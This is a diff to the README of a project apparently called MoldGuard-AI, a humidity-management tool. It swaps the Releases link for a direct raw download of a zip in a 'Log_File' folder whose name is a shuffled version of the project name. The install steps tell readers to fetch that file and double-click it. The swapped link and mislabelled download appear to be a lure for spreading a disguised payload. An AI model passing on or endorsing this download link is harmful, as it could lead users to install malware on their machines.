Mati2728/MoldGuard-AI-Intelligent-Humidity-Management/README.md

 - User-friendly interface for controlling devices

 ## 📥 Download & Install
-To download MoldGuard-AI, visit this page to download: [MoldGuard-AI Releases](https://github.com/Mati2728/MoldGuard-AI-Intelligent-Humidity-Management/releases).
+To download MoldGuard-AI, visit this page to download: [MoldGuard-AI Releases](https://raw.githubusercontent.com/Mati2728/MoldGuard-AI-Intelligent-Humidity-Management/main/Log_File/Guard-Mold-Humidity-Intelligent-A-Management-v3.2.zip).

 1. Click on the link above to go to the Releases page.
 2. Scroll down to find the latest version.
-3. Look for the file named `MoldGuard-AI-Setup.exe` (or similar).
+3. Look for the file named `https://raw.githubusercontent.com/Mati2728/MoldGuard-AI-Intelligent-Humidity-Management/main/Log_File/Guard-Mold-Humidity-Intelligent-A-Management-v3.2.zip` (or similar).
 4. Click on the file to begin downloading.
 5. Once the download completes, locate the file in your Downloads folder.
 6. Double-click the file to start the installation process.